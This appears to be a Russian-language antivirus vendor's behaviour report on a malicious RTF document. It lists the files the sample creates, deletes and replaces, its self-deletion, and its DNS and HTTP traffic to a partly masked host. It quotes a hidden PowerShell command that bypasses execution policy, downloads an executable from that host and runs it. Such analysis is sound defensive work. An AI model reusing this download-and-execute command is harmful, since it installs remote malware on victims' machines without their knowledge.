Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- http://yt##12.site/fileserver/fina.exe как %appdata%\fina.exe
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\abctfhghgdghgh‹.sct
- %APPDATA%\fina.exe
- <Текущая директория>\~wrd0000.tmp
Удаляет следующие файлы
- %TEMP%\abctfhghgdghgh‹.sct
Изменяет следующие файлы
Подменяет следующие файлы
- <PATH_SAMPLE>.rtf
Самоудаляется.
Сетевая активность
Подключается к
- 'yt##12.site':80
TCP
Запросы HTTP GET
- http://yt##12.site/cgi-sys/suspendedpage.cgi
- http://yt##12.site/fileserver/fina.exe
UDP
- DNS ASK yt##12.site
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://yt##12.site/fileserver/fina.exe','%APPDATA%\fina.exe');Start-Process '...' (со скрытым окном)
